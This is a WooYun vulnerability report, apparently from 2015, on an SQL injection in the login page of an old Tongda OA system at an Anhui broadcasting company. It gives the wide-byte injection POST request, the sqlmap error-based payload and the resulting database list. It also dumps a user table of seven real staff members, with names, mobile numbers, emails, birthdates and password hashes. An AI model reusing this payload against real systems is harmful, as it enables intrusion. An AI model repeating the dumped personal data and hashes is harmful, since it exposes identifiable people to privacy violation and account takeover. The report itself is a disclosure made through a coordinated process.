当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155085

漏洞标题:安徽广电OA办公系统漏洞#数据库全部信息泄漏

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-23 11:54

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

0x01 漏洞位置

http://**.**.**.**/


0x02 漏洞类型

sql注入


通达OA 老版本问题
0x03 漏洞详情
首先,参考了前辈的文章

http://**.**.**.**/bugs/wooyun-2010-078915


发现登录界面POST注入

PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27


LV{~{`KAD[I%}TTP9TNHH}8.png


0x04 漏洞请求参数
于是乎,采用了前辈的注入方法

POST /logincheck.php HTTP/1.1
Host: **.**.**.**
Content-Length: 47
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=60491e719c9eb87a488878cc39fd0c34
PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27


0x05 注入方法
在利用了宽字节后,丢sqlmap,跑就好啦

漏洞证明:

0x06 漏洞测试结果

---
Place: POST
Parameter: UNAME
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: PASSWORD=g00dPa$$w0rD&submit=%b5%c7 %c2%bc&UI=0&UNAME=%bf' AND (SELECT 7167 FROM(SELECT COUNT(*),CONCAT(0x71736f7671,(SELECT (CASE WHEN (7167=7167) THEN 1 ELSE 0 END)),0x71656e7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hBls
---
[20:33:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
available databases [5]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] TD_OA


这里仅跑一下管理员表

Database: TD_OA
Table: user
[7 entries]
+-----+--------+---------+---------+---------------+-----------------+--------------+-----+------+-------------+---------+---------------------+-------+-------+-------+--------+---------+---------+---------+---------+------------+----------+--------+---------------+---------+----------+---------+----------+------------+----------+----------+------------------------------------+----------+-------------+----------+-------------+----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+--------------+-------------+-------------+-------------+--------------+-------------+--------------+--------------+--------------+--------------------------+--------------+--------------+----------------------------------+-------------------------+---------------+---------------+-----------------+----------------+---------------------+----------------+-----------------+-----------------+---------------------+------------------+
| UID | PIC_ID | DEPT_ID | USER_ID | DEPT_ID_OTHER | MOBIL_NO_HIDDEN | MSN          | SEX | UIN  | BP_NO       | PHOTO   | EMAIL               | PANEL | THEME | SCORE | SMS_ON | PORTAL  | ICQ_NO  | REMARK  | KEY_SN  | ONLINE     | BYNAME   | AVATAR | MY_RSS        | USER_NO | OICQ_NO  | BIND_IP | IS_LUNAR | BIRTHDAY   | ADD_HOME | IM_RANGE | PASSWORD                           | DISABLED | SHORTCUT    | BKGROUND | MOBIL_NO    | SHOW_RSS | NOT_LOGIN | MY_STATUS | ON_STATUS | MOBILE_SP | POST_PRIV | USER_NAME | NICK_NAME | USER_PRIV | POST_DEPT | AUTHORIZE | DUTY_TYPE | MENU_TYPE | TDER_FLAG | USEING_KEY | NOT_SEARCH | MOBILE_PS1 | MENU_IMAGE | MOBILE_PS2 | CALL_SOUND | WEBMAIL_NUM | TEL_NO_HOME | FAX_NO_DEPT  | MENU_EXPAND | USER_DEFINE | LIMIT_LOGIN | TEL_NO_DEPT  | BBS_COUNTER | USING_FINGER | CANBROADCAST | CONCERN_USER | MYTABLE_LEFT             | WEATHER_CITY | POST_NO_HOME | BBS_SIGNATURE                    | MYTABLE_RIGHT           | SECURE_KEY_SN | NOT_VIEW_USER | LAST_VISIT_IP   | NOT_VIEW_TABLE | LAST_PASS_TIME      | EMAIL_CAPACITY | USER_PRIV_OTHER | FOLDER_CAPACITY | LAST_VISIT_TIME     | WEBMAIL_CAPACITY |
+-----+--------+---------+---------+---------------+-----------------+--------------+-----+------+-------------+---------+---------------------+-------+-------+-------+--------+---------+---------+---------+---------+------------+----------+--------+---------------+---------+----------+---------+----------+------------+----------+----------+------------------------------------+----------+-------------+----------+-------------+----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+--------------+-------------+-------------+-------------+--------------+-------------+--------------+--------------+--------------+--------------------------+--------------+--------------+----------------------------------+-------------------------+---------------+---------------+-----------------+----------------+---------------------+----------------+-----------------+-----------------+---------------------+------------------+
| 1   | 0      | 98      | admin   | <blank>       | 0               | <blank>      | 0   | 1001 | <blank>     | <blank> | <blank>             | 1     | 2     | 0     | 0      | <blank> | <blank> | <blank> | <blank> | 9355190    | <blank>  | 9      | <blank>       | 10      | <blank>  | <blank> | 0        | 1900-01-01 | <blank>  | 1        | $1$WC..nU/.$efr4y/J1UQA934qhesh4C/ | 0        | <blank>     | <blank>  | 13865952032 | 1        | 0         | <blank>   | 1         | <blank>   | 1         | 系统管理员     | <blank>   | 1         | <blank>   | 0         | 1         | 1         | 1         | 0          | 0          | <blank>    | 0          | <blank>    | 0          | 0           | <blank>     | <blank>      | <blank>     | <blank>     | 0           | <blank>      | 35          | 0            | 1            | <blank>      | 1,50,2,14,25,48,49,      | 58321        | <blank>      | <blank>                          | 6,23,3,17,16,9,18,7,    | <blank>       | 0             | **.**.**.**   | 0              | 2015-05-08 11:26:20 | 0              | <blank>         | 0               | 2015-11-20 15:08:57 | 0                |
| 2   | 84     | 90      | lzg     | <blank>       | 1               | ahlzg@**.**.**.** | 0   | 1002 | <blank>     | <blank> | ahlzg@**.**.**.**        | 1     | 1     | 0     | 0      | <blank> | <blank> | <blank> | <blank> | 2147483647 | lvzhiguo | 0      | 196,198,:197, | 7       | 10296293 | <blank> | 0        | 1977-04-17 | <blank>  | 1        | $1$Wy4.nE/.$yfwjrUNZTq2nZa/.ae1.4. | 0        | 1,3,42,100, | <blank>  | 18949800552 | 0        | 0         | <blank>   | 1         | <blank>   | 1         | 吕治国       | 被爱收藏      | 5         | <blank>   | 0         | 1         | 1         | <blank>   | 0          | 0          | <blank>    | 0          | <blank>    | 0          | 0           | <blank>     | 0551-5321771 | <blank>     | <blank>     | 0           | 0551-5350758 | 251         | 0            | 1            | <blank>      | 1,50,14,23,2,48,         | 58321        | <blank>      | 省公司运营中心-吕治国\r\n联系电话:0551-5350758 | 6,16,18,25,7,9,         | <blank>       | 0             | **.**.**.**    | 0              | 2014-04-04 15:10:08 | 0              | 35,             | 0               | 2015-11-18 15:39:46 | 0                |
| 3   | 0      | 67      | 姚立新     | <blank>       | 1               | <blank>      | 0   | 0    | <blank>     | <blank> | <blank>             | 1     | 1     | 0     | 1      | <blank> | <blank> | <blank> | <blank> | 49970624   | <blank>  | 0      | <blank>       | 10      | <blank>  | <blank> | 0        | 1900-01-01 | <blank>  | 1        | $1$/p1.a9/.$1qrDLozMX0FvdmdjgGpYB. | 0        | <blank>     | <blank>  | 13329266578 | 1        | 0         | <blank>   | 1         | <blank>   | 0         | 姚立新       | <blank>   | 12        | <blank>   | 0         | 1         | 1         | <blank>   | 0          | 0          | <blank>    | 0          | <blank>    | 1          | 0           | <blank>     | 0556-6121278 | <blank>     | <blank>     | 0           | 0556-6121278 | 0           | 0            | 0            | <blank>      | 1,2,3,14,19,23,48,49,50, | 58424        | <blank>      | <blank>                          | 6,4,7,16,17,18,20,25,   | <blank>       | 0             | **.**.**.**   | 0              | 2009-10-27 08:12:05 | 20             | <blank>         | 20              | 2015-11-20 15:17:57 | 0                |
| 4   | 0      | 64      | 魏小明     | <blank>       | 0               | <blank>      | 1   | 0    | <blank>     | <blank> | <blank>             | 1     | 3     | 0     | 1      | <blank> | <blank> | <blank> | <blank> | 44235710   | <blank>  | 1      | <blank>       | 10      | <blank>  | <blank> | 0        | 1900-01-01 | <blank>  | 1        | $1$mR/.1T4.$Iar.6v8xf.sxoJSsD17fo1 | 0        | <blank>     | <blank>  | <blank>     | 1        | 0         | <blank>   | 1         | <blank>   | 0         | 魏小明       | <blank>   | 18        | <blank>   | 0         | 1         | 1         | <blank>   | <blank>    | 0          | <blank>    | 0          | <blank>    | 1          | 0           | <blank>     | <blank>      | <blank>     | <blank>     | 0           | <blank>      | 0           | 0            | 0            | <blank>      | 1,2,14,48,49,50,         | 58429        | <blank>      | <blank>                          | 5,6,7,9,16,17,18,21,24, | <blank>       | 0             | **.**.**.** | 0              | 2007-09-20 08:31:35 | 100            | <blank>         | 100             | 2015-11-20 09:03:23 | 0                |
| 5   | 0      | 98      | 方春霞     | <blank>       | 0               | <blank>      | 1   | 0    | <blank>     | <blank> | fang_fcx@**.**.**.**    | 1     | 1     | 0     | 1      | <blank> | <blank> | <blank> | <blank> | 56878973   | fcx      | 1      | <blank>       | 1       | <blank>  | <blank> | 0        | 1976-04-10 | <blank>  | 1        | $1$na3.kh4.$P4zNMYd2qFJ5JFfdAyYks. | 0        | <blank>     | <blank>  | 13956045400 | 1        | 0         | <blank>   | 1         | <blank>   | 1         | 方春霞       | <blank>   | 4         | <blank>   | 0         | 1         | 1         | <blank>   | 0          | 0          | <blank>    | 0          | <blank>    | 1          | 0           | <blank>     | 0551-5321771 | <blank>     | <blank>     | 0           | 0551-5350702 | 58          | 0            | 0            | <blank>      | 1,50,3,14,2,23,48,49,    | 58321        | <blank>      | 总经办-方春霞                          | 6,17,16,20,7,9,         | <blank>       | 0             | **.**.**.**    | 0              | 2009-11-30 09:40:35 | 2000           | 1,22,23,5,      | 0               | 2015-11-20 09:01:39 | 0                |
| 6   | 0      | 64      | 左清      | <blank>       | 1               | <blank>      | 0   | 0    | 18505627575 | <blank> | zuoqing@**.**.**.** | 1     | 8     | 0     | 0      | <blank> | <blank> | <blank> | <blank> | 15573796   | <blank>  | 0      | <blank>       | 10      | <blank>  | <blank> | 0        | 1972-09-21 | <blank>  | 1        | $1$kY2.da5.$VSWypAF81DZdv1yvwlohz0 | 0        | <blank>     | <blank>  | 13365517575 | 1        | 0         | <blank>   | 1         | <blank>   | 0         | 左清        | <blank>   | 12        | <blank>   | 0         | 1         | 1         | <blank>   | 0          | 0          | <blank>    | 0          | <blank>    | 1          | 0           | <blank>     | <blank>      | <blank>     | <blank>     | 0           | 0562-7110168 | 9           | 0            | 0            | <blank>      | 1,2,3,23,14,48,50,       | 58321        | <blank>      | <blank>                          | 6,7,16,17,18,20,9,      | <blank>       | 0             | **.**.**.** | 0              | 2006-03-10 09:26:32 | 100            | <blank>         | 100             | 2015-11-19 09:01:34 | 0                |
| 7   | 0      | 89      | 余洁      | <blank>       | 1               | <blank>      | 1   | 0    | <blank>     | <blank> | <blank>             | 1     | 2     | 0     | 1      | <blank> | <blank> | <blank> | <blank> | 47833142   | collines | 1      | <blank>       | 2       | <blank>  | <blank> | 0        | 1979-03-23 | <blank>  | 1        | $1$pa..8V5.$lZx2X58I55SypQ1KmrOxu0 | 0        | <blank>     | <blank>  | 15505517766 | 1        | 0         | <blank>   | 1         | <blank>   | 1         | 余洁        | <blank>   | 5         | <blank>   | 0         | 1         | 2         | <blank>   | 0          | 0          | <blank>    | 0          | <blank>    | 0          | 0           | <blank>     | 5321771      | <blank>     | <blank>     | 0           | 0551-5350722 | 0           | 0            | 0            | <blank>      | 50,1,14,20,23,           | 58321        | <blank>      | <blank>                          | 6,2,9,                  | <blank>       | 0             | **.**.**.**    | 0              | 2010-04-09 09:13:35 | 400            | 13,35,          | 100             | 2015-11-20 09:13:16 | 0                |


OK,全部的数据库信息都是可以得到的。。。

修复方案:

升级吧!!!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 10:18

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。

最新状态:

暂无